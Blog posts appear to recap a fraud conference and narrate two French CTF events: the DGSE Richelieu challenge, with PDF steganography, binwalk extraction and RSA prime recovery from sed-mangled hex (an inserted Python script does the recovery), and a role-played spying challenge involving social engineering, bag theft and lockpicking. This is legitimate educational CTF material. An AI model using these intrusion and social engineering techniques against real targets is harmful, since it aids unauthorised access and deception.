In this panel, they started by talking about mobile attacks, saying that the minute something is patched, something new is out. Companies have to make things safer without changing the customer experience too much.

Nadav Katzenell: Remote overlay trojans attack and detection

Nadav Katzenell is head of security research at IBM Security. In this talk he explained the remote overlay trojan attack. It is an attack that originated in Brazil and then quickly expanded in South America and to new industries. Then he explained how his team set up a solution to detect this kind of attack.

Yehonatan Bar-Lev: The power of fusion center

Yehonatan Bar Lev is head of the Cyber Center at Bank Hapoalim. He showed us the organization of a drug ring from the inside: what skills they have, how they work, how they hire staff and what type of attacks they launch.

Mirko Manske: A sunday in hell

Mirko Manske is a federal criminal police officer in Germany. In this talk he explained how he and his team confronted an internet « provider from hell » to get them to collaborate on a special case. He gave us an inside view of how German police and prosecutors work on such cases.

Panel ecommerce fraud, the next generation

Panel ecommerce fraud, the next generation

In this panel, Noa Kind started to explain what Ad Fraud is and how it was countered. Then, other persons from the panel explained how consulting works.

Karisse Hendrix: fighting online fraud is a lot like fighting zombies

Karisse Hendrick is an eCommerce Chargebacks & Fraud Consultant. In this talk she explained how online fraud evolved and shared her insights as a consultant. She also co-hosts a podcast that you can find in the « To go further » section.

Spencer McLain: Fighting fraud with collaboration

Spencer McLain is Vice President at Ekata. In this talk he first explained that online sales are increasing, in order to frame the authorization rate and fraud problem. He showed how fraud and solutions to fraud have evolved, and he gave a holistic approach to fraud prevention.

Sergey Shykevich: Even idiots can do fraud

Sergey Shykevich is cyber threat intelligence team manager at Q6 Cyber. In this talk, Sergey Shykevich explained that even with very basic knowledge anyone could do fraud. To prove his point he even showed an example.

Raymond King: Robbing the digital train

Raymond King is a product manager at TransferWise. In this talk, he first presented TransferWise. Then he explained what kind of fraud TransferWise is confronted with, the consequences it has and how they prevented it.

Ethan Ram: Fraudulent App installs

Ethan Ram is VP R&D at ZoomD. In this talk he explained what App Install Fraud is, how it works and how to fight it.

Panel: What’s new in marketplace fraud

Panel: What’s new in marketplace fraud

In this panel, they all shared insights from their different companies. First they shared the kind of fraud they are confronted with. Then they gave their opinions about machine learning and artificial intelligence to detect fraud. They talked about the collaborations they have with other platforms in the marketplace. Finally they shared some advice for fraud-fighting teams.

To happily finish the day at FraudCon we played a fun little game in which we had to decide whether the case presented to us was « friendly fraud » or « true fraud ».


Learning expeditions are a really good way to learn. You get to see different things and discover the world at the same time. The CyberWeek was an awesome experience; I really enjoyed the talks and got to learn a lot. If you have the opportunity to go to the CyberWeek you definitely have to go to BSides TLV and FraudCon.

To go further

Hacker for the DGSE – Challenge Richelieu

To expand its teams, the DGSE organized a challenge: the Challenge Richelieu.

To access it, you had to go to the site:

Home page of the Challenge Richelieu

And that's it! It was then up to me to investigate…

First reflex, then: open the web console and look at the page source, and there I discovered the existence of a PDF file:

Source code of the Challenge Richelieu home page

I accessed the file by appending « /Richelieu.pdf » to the address in the browser, which gave me what looked like a 364-page PDF with black text on a white background on the first page:

First page of the PDF

But since I am not fooled that easily, I selected the whole document:

Selection on the PDF

And of course text was hidden. So I selected all the text and pasted it into my favorite notepad.

Here is an excerpt (a long run of base64 text):


I recognized base64 encoding. I then decoded this text and ran « strings » on the file:

strings on the decoded file
Result of the command

This gave me a list of files and a password.

So there are files embedded in the PDF. I will spare you my in-depth research on PDF structures (see the links at the end of the article if you want to learn more; I strongly encourage you to, because it is fascinating).

It is also interesting to note that if you rename the file to .jpg you get an image:

Renaming the file to jpg

Now to answer the question one inevitably asks, or at least the one I pondered for a long time: how do I recover and extract the files? There is a very handy tool for this: binwalk

binwalk result

Binwalk displays all the files we were promised, which is a good sign! I will be able to extract them with the -e option

Here my file is called base64.jpg; binwalk will create a folder _base64.extracted and put everything it could extract in it:

Result of binwalk -e

Here is the content of the folder created by binwalk:

Result of ls in the folder created by binwalk

I then tried to unzip the file (the zip password is the one found earlier in the base64):

Password
Unzipping the file and recovering the files

So I recovered the files and their contents.

Contents and size of the files we just extracted

It is important to note at this stage that, seeing the files obtained and their names, it seemed to me that I was going to have to crack an RSA key… Indeed, I have a public key « public.key » and a strange « prime.txt » file.

So I set about understanding the .bash_history. Knowing Linux a little, you know that .bash_history contains the history of typed commands. So I ran cat on the file to find out what had been typed to create the files.

cat on the .bash_history file

I noticed several uses of the sed command, which works with regular expressions. A quick search taught me more:

The sed general syntax

I understand that prime.txt is an RSA key, but that it was modified with the sed command.

Here is what was done with sed:

// 7f was replaced by fb throughout the document
sed -i 's/7f/fb/g' prime.txt

// e1 was replaced by 66 throughout the document
sed -i 's/e1/66/g' prime.txt

// f4 was replaced by 12 throughout the document
sed -i 's/f4/12/g' prime.txt

// 16 was replaced by 54 throughout the document
sed -i 's/16/54/g' prime.txt

// a4 was replaced by 57 throughout the document
sed -i 's/a4/57/g' prime.txt

// b5 was replaced by cd throughout the document
sed -i 's/b5/cd/g' prime.txt

So here you would have to run the commands in reverse to recover the original file.
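Running the commands "in reverse" is not quite enough, because each sed substitution is lossy: once every 7f has become fb, a byte that now reads fb may have been either. The script below is an added example, not part of the original write-up, that reproduces the situation with a small constructed key (the key size, the seeds for p and q and the value of e are invented; only the six substitutions come from the .bash_history). It replays the substitutions on the colon-separated hex dump, enumerates every candidate reversal, and keeps the one that actually divides the public modulus n, which is the check a practitioner has available because public.key is known.

```python
"""Recover an RSA prime whose hex dump was rewritten by sed 's/a/b/g' commands.

Constructed example: the six substitutions are the ones from the .bash_history;
the key size, the seeds for p and q and the public exponent are made up.
"""
import math
import random
from itertools import product

# (from, to) byte substitutions, in the order the sed commands were run.
SED_STEPS = [("7f", "fb"), ("e1", "66"), ("f4", "12"),
             ("16", "54"), ("a4", "57"), ("b5", "cd")]


def is_probable_prime(n, rounds=32):
    """Miller-Rabin with a fixed seed so the example is reproducible."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    rng = random.Random(1234)
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def next_prime(n):
    n |= 1
    while not is_probable_prime(n):
        n += 2
    return n


def to_hex_pairs(n):
    """openssl's text dump prints one byte per colon-separated hex pair."""
    h = f"{n:x}"
    h = h if len(h) % 2 == 0 else "0" + h
    return [h[i:i + 2] for i in range(0, len(h), 2)]


def mangle(pairs, steps=SED_STEPS):
    """Replay the sed commands.  Because the dump is colon-separated, a
    two-digit pattern can only match a whole byte: the rewrite is byte-aligned."""
    out = list(pairs)
    for a, b in steps:
        out = [b if x == a else x for x in out]
    return out


def naive_unmangle(pairs, steps=SED_STEPS):
    """Literal reversal: every b becomes a again.  Wrong whenever the
    original dump already contained some b bytes before the sed run."""
    out = list(pairs)
    for a, b in reversed(steps):
        out = [a if x == b else x for x in out]
    return out


def candidate_originals(pairs, steps=SED_STEPS):
    """Undo the steps in reverse order, exploring both readings of every byte
    that matches the replacement: an untouched b or a rewritten a."""
    candidates = [list(pairs)]
    for a, b in reversed(steps):
        expanded = []
        for cand in candidates:
            positions = [i for i, x in enumerate(cand) if x == b]
            for choice in product((b, a), repeat=len(positions)):
                new = list(cand)
                for pos, val in zip(positions, choice):
                    new[pos] = val
                expanded.append(new)
        candidates = expanded
    return candidates


def recover_prime(mangled_pairs, n):
    """Return the candidate that really is a factor of the public modulus."""
    for cand in candidate_originals(mangled_pairs):
        p = int("".join(cand), 16)
        if 1 < p < n and n % p == 0:
            return p
    return None


def private_exponent(p, n, e):
    """With p recovered, q = n // p and the private exponent follows."""
    return pow(e, -1, (p - 1) * (n // p - 1))


# Constructed key material (not the challenge's).  p deliberately contains both
# sides of every substitution so that the mangled dump is ambiguous to reverse.
P = next_prime(int("7ffbe166f412165457a4b5cd00000001", 16))
Q = next_prime((1 << 127) + 0x1234567)
N = P * Q
E = next(e for e in range(65537, 1 << 20, 2) if math.gcd(e, (P - 1) * (Q - 1)) == 1)

if __name__ == "__main__":
    mangled = mangle(to_hex_pairs(P))
    naive = int("".join(naive_unmangle(mangled)), 16)
    print("naive reversal divides n:", N % naive == 0)      # False
    print("search recovered p:", recover_prime(mangled, N) == P)  # True
```

With a real 2048-bit key the search stays small, since each two-digit pattern matches only a handful of the 128 bytes of prime1.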

Je vais maintenant essayer de comprendre en quoi consiste la commande : openssl rsa -noout -text -in priv.key | grep prime1 -A 18 > prime.txt

Grâce à une recherche j’apprend ceci:


Cette commande permet donc juste d’afficher la clé privé.

J’ai eu quelques difficultés sur cette partie du fait de mon manque de connaissances en cryptographie.

J’ai donc fait des recherches afin de continuer car j’étais curieuse de savoir sur quoi cela allait déboucher. J’ai pu trouver le mot de passe pour décompresser

Ce zip contenait un fichier texte avec des informations nécessaires à la continuation du défi.

Il était possible de se connecter en ssh à un serveur dédié au challenge.

Suite du challenge

On passait ensuite sur la partie Wargame du challenge.

Connexion en ssh au wargame richelieu

J’ai un peu joué avec le défi 1 mais j’ai malheureusement manqué de temps pour finir les défis. En manipulant un peu le défi 1, j’ai compris qu’il s’agit d’un buffer overflow à exploiter.

En effet voici le résultat d’un ls -al :

Commande ls -al

Je n’ai évidemment pas les droits nécessaire pour faire un cat sur « drapeau.txt ». Je sais que je peux exécuter le programme grâce aux droits que j’ai a sur prog.bin : -r-sr-sr-x

Je l’ai donc lancé et j’ai pu m’amuser un moment avec les différentes options… Fun fact: avec l’option 3 j’ai vu devant mes yeux ébahis un petit train qui passait sagement:

Petit train express DGSE

Le principe ici était d’exploiter le buffer overflow pour faire des commandes réservées à root. En effet, j’avais noté la présence du « s » sur le programme prog.bin. Ce « s » permet à l’exécutable d’effectuer des commandes que le propriétaire du fichier aurait pu faire. C’est grâce à ceci que j’ai pu en apprendre plus sur la fameuse attaque: « return oriented programming ». En exploitant cette attaque j’aurais pu essayer de faire faire un cat drapeau.txt par le programme.

Important note: thanks to Geluchat on Twitter, I learned that the approach for challenge 1 of the wargame was much simpler than I had imagined:

So that was my experience of the Richelieu challenge. I really enjoyed it because I learned a huge amount about PDFs and got to discover the return oriented programming attack. I think it is worth noting that even if you cannot, or do not necessarily have the time to, finish the challenges, you still learn a great deal by spending even a little time on them.

So if you get the chance, I encourage you to take on the next challenge offered by the DGSE; who knows, you might get hired!

Going further

Report on WoSEC Paris' participation in the LeHack 2019 Spying Challenge

Scroll down for the English version

Teaser for the LeHack 2019 Spying Challenge

As part of WoSEC Paris' activities, I put together a CTF team for the 2019 Spying Challenge at the LeHack conference in Paris.

Spying Challenge logo

What is the Spying Challenge?

For this third edition at « leHACK », against a backdrop of ever-present economic intelligence, your mission will be to gather information on a set of targets in order to satisfy your swindled clients.

This mission will involve open-source research, vishing, tailing, social engineering, physical intrusion, lockpicking, and more.

How does it work?

A first qualifying round before « leHACK » will single out the best teams, who will get to continue the experience. Then, on 6 July, you will be in the thick of the action!


The phases of the Spying Challenge

Phase 1: OSINT, GEOINT, social engineering and report

Agents Dupont and Martin called on several agencies, including WoSEC Paris, to investigate a suspicious company. Here is the mission order (an email with an attached PDF describing the objective of the mission):

Introducing the WoSEC Paris agents

Christine Granville aka @Gabrielle_BGB

Agent Granville

Ash aka @asdmhx

Agent Ash

Lucy Elizabeth Smith aka @catr42

Agent Smith

To be selected, we had to pass this phase, which consisted of writing a documented report on our work: OSINT, GEOINT and social engineering by phone or by email/chat.

Excerpts from the report

Here is the report we submitted to agents Dupont and Martin:

Here is also the recording of Agent Ash's call to Lictor (the link in the report is no longer valid):

Selection email for phase 2

We were accepted into the following phases, which I describe here.

Phase 2: the physical Spying Challenge at LeHack Paris

Before starting this phase, we received an email with more details on how the mission would unfold:

Email describing phase 2

To describe this phase, I will go through each mission we were given over the course of the day.

1. Interact with as many Lictor employees as possible in order to gather new information on your targets.

Equipped with microphones, the agents quickly spotted the Lictor stand.

  • Ash wore a Spartan t-shirt and had to approach Liliana (business engineer at Lictor);
  • Granville blended into the room to reach the Lictor stand incognito and interact with the various employees;
  • Smith played the part of an intern looking for a cool position and approached Lictor to find out more about their activities.

2. Identify and photograph the employee Jack Barrel

Operation still in progress…

3. 11:35 am: meeting with Lictor's CEO

At this stage, new (time-limited) missions were assigned to us:

  • Social-engineer Lictor's CEO to obtain more information about him (carried out by Agent Ash) while creating a diversion.
  • Discreetly take the CEO's bag in order to swap a CD and photograph as much of its contents as possible (carried out by Agent Smith and Agent Granville).

4. Neutralisation and search

During this meeting, we were given the following missions:

  • Lictor's employees, having discovered that Agent Dupont was undercover, decided to eliminate him. To stop them, Agent Smith was tasked with poisoning the drink of the employee in charge of neutralising Agent Dupont.
  • A suspicious room, most likely fitted with microphones, had to be searched with a detector. As the room was under surveillance, Agent Ash had to create a diversion so that Agent Granville could get in to search it and detect the microphones. Employees caught Agent Granville during her search and she had to use her powers of persuasion to avoid raising suspicion.

5. Tailing

In this phase, the task was to follow the Lictor employees who had kidnapped Gustave Leproleau, and so to find the place where Gustave was being held. The agents carried out several tails and identified the hideout where Gustave Leproleau was locked up.

6. Free Gustave

For the last mission, we had to free Gustave. Our plans, however, did not go as expected: a horde of hooded henchmen dressed all in black chased us down and locked us up separately.

Agent Ash and Agent Granville were locked in a room. Handcuffed, Agent Granville used her hair clip to free herself. With her hands bound, Agent Ash managed to break the plastic tie in order to open the safe where TOP SECRET information was hidden.

Meanwhile, Agent Smith underwent a tough interrogation that did not impress her in the least.

France's elite according to the Spying Challenge team

WoSEC Paris: winners of the Spying Challenge 2019, LeHack Paris

We honoured our mission by freeing Gustave Leproleau from the clutches of this unscrupulous company.

Agent Smith, Gustave Leproleau, Agent Granville, Agent Ash (under the lovely WoSEC logo)

Top 3 ranking:

WoSECParis, first place!
SpyKidsIH3, second place
Project BlueBird, third place

The successive rankings of the day

OSINT and SE phase ranking
Phase 2 ranking (SE, document theft, poisoning and surveillance)
Final ranking (lockpicking, lie detector, escape)

Spying Challenge tweet about our victory

Official write-up of the WoSEC Paris team


Thanks to @asdmhx and @catr42 for their enthusiasm and determination!

WoSEC Paris thanks the Spying Challenge team for organising this thrilling challenge and for the realistic scenarios at LeHack.

The Spying Challenge team

Thanks also to all the Spying Challenge participants for giving us a run for our money.

Finally, a big thank you to LeHack for hosting such an event.

Report on WoSEC Paris' participation in the LeHack 2019 Spying Challenge

Teaser for the LeHack 2019 Spying Challenge

As part of WoSEC Paris' activities, I put together a CTF team for the 2019 Spying Challenge at the LeHack conference in Paris.

Spying Challenge logo

What is the Spying Challenge?

For this third edition at “leHACK”, against a backdrop of ever-present economic intelligence, your mission will be to gather information on a set of targets in order to satisfy your clients.

This mission will involve open-source research, vishing, tailing, social engineering, physical intrusion, lockpicking, and more.

How does it work?

A first qualifying round before “leHACK” will single out the best teams, who will get to continue the experience. Then, on 6 July, you will be in the thick of the action!


The phases of the Spying Challenge

Phase 1: OSINT, GEOINT, Social Engineering and report

Agents Dupont and Martin called on several agencies, including WoSEC Paris, to investigate a suspicious company. Here is the mission order (an email with an attached PDF describing the objective of the mission):

Presentation of the agents of WoSEC Paris:

Christine Granville aka @Gabrielle_BGB

Agent Granville

Christine Granville, a social engineering enthusiast, is very persuasive. When she was a baby, she hacked the exit code of her mother's womb. As a child, lockpicking was her favourite extracurricular activity. Today at the WoSEC Paris agency nothing can resist her; she and her two favourite sidekicks (Ash and Lucy Elizabeth) are in charge of the most dangerous missions.

Ash aka @asdmhx

Agent Ash

Iron fist in a velvet glove, Ash has always known how to stand out through her taste for fighting and high-risk excursions. Her passions in life: knee-breaking and videos of baby axolotls. She recently joined the WoSEC Paris team to put her social engineering skills to use, and also to learn how to worm information out of a source without the source ending up as an IKEA kit.

Lucy Elizabeth Smith aka @catr42

Agent Smith

Passionate since her early childhood about puzzles, investigations, coded messages and everything that makes knots in the brain, Lucy decided one day to put her talents at the service of the WoSEC Paris agency.

To be selected, we had to pass this phase, which consisted of writing a documented report on our work: OSINT, GEOINT and social engineering by phone or by email/chat.

Extract of the report

The report is available in French only.

Mail confirming our qualification for phase 2

We qualified to move on to the next phases, which I will describe here.

Phase 2: The Physical Spying Challenge at LeHack Paris

Before starting this phase, we received an e-mail with more information about the mission:

Dear agents,

Reading your report convinced us of your ability to
collect relevant information. Your feedback has allowed us to
make great progress in our investigation of Lictor.
As indicated above, we have therefore decided to keep you on
this mission which will continue on July 6, 2019.

Between 10am and 12pm, you should:

  • Interact with as many people as possible employed by Lictor in order to
    retrieve new information about your targets;

  • Identify and take a picture of employee Jack Barrel (he is highly
    suspicious and only shows up at the stand from time to time);

  • Go to the place indicated in attachments at 11:35 a.m.
    (no delays will be tolerated), where you will have to meet the CEO
    of Lictor, and where you will be informed of your orders for the rest of
    the operation.

If possible, bring back a lockpicking kit, enough to take pictures,
write a report in digital format, and your boldness.
We expect a brief report on your new findings to

PS: Do not follow or interact with targets unless they are
wearing a cap with the Lictor logo on it (according to our information, the
CEO of Lictor and Jack Barrel will not wear hats: you
will still be able to talk to them).
Similarly, you will only be able to interact with Gustave Leproleau
when he wears his beret.

PPS: The service apologises for the late hour; there were office drinks.


Agents Dupont and Martin

To describe the phase I will present each mission that was given to us throughout the day.

1. Interact with as many Lictor employees as possible to retrieve new information about your targets.

Equipped with microphones, the agents quickly spotted Lictor's booth.

  • Ash wore a Spartan t-shirt and had to approach Liliana (business engineer at Lictor);
  • Granville blended into the room to reach the Lictor booth incognito and interact with the various employees;
  • Smith played the role of an intern looking for a cool position and came to the Lictor stand to find out more about their activities.

2. Identify and take a picture of the employee Jack Barrel

Operation still in progress…

3. 11:35 am Meeting with the CEO of Lictor

At this stage we were given new (time-limited) missions:

  • Social engineering on the CEO of Lictor to get more information about him (done by Agent Ash) while creating a diversion.
  • Discreetly take the CEO's bag to swap a CD and take as many pictures as possible of its contents (done by Agent Smith and Agent Granville).

4. Neutralization and search


Congratulations, your mission continues.
Meet us at 3:15 pm in front of the Lictor stand to receive your instructions.

Agents Dupont and Martin

During this meeting, we were given the following tasks:

  • When Lictor's employees discovered that Agent Dupont was undercover, they decided to eliminate him.
    To stop them, Agent Smith was given the task of poisoning the drink of the employee responsible for Agent Dupont's neutralisation.
  • A suspicious room, most likely fitted with microphones, had to be searched with a detector. With the room under surveillance, Agent Ash had to create a diversion so that Agent Granville could enter the room to search it and detect the microphones. Some employees caught Agent Granville during her search and she had to use her persuasive skills to avoid arousing suspicion.


Phase 3 of your mission is not complete. We will meet at 4:30 pm at the Lictor stand for a final tailing exercise. You will receive your orders on site.

At the end of this test, a selection will be made and only the
best agents will participate in the final phase.


Agents Dupont and Martin

5. Tailing

During this phase, we had to follow the Lictor employees who had kidnapped Gustave Leproleau, and so find the place where Gustave was being held. The agents carried out several tails and identified the hideout where Gustave Leproleau was locked up.

6. Releasing Gustave

For the last mission we had to free Gustave. However, our plans did not go as expected: a horde of hooded minions dressed all in black chased us and locked us up separately.

Agent Ash and Agent Granville were locked in a room. Handcuffed, Agent Granville used her hair clip to free herself. With her hands tied, Agent Ash managed to break the plastic tie in order to open the safe in which TOP SECRET information was hidden.

Meanwhile, Agent Smith was subjected to a tough interrogation that did not impress her at all.

France’s elites according to the Spying Challenge team

WoSEC Paris: winners of the Spying Challenge 2019, LeHack Paris

We honoured our mission by freeing Gustave Leproleau from the clutches of this unscrupulous company.

Agent Smith, Gustave Leproleau, Agent Granville and Agent Ash (under the beautiful WoSEC logo)

Top 3 ranking

WoSECParis first place!

SpyKidsIH3 second place

Project BlueBird third place

Rankings of the day

OSINT and SE phase ranking

SE, document theft, poisoning and surveillance ranking

Last ranking (lockpicking, lie detector, escape)

Spying challenge tweet about our victory


Thanks to @asdmhx and @catr42 for their enthusiasm and commitment!

WoSEC Paris thanks the Spying Challenge team for organizing this exciting challenge and the realistic role-playing during LeHack.

The Spying Challenge team

Thanks also to all the participants of the Spying Challenge for giving us a hard time.

Finally, a big thank you to LeHack for hosting such an event.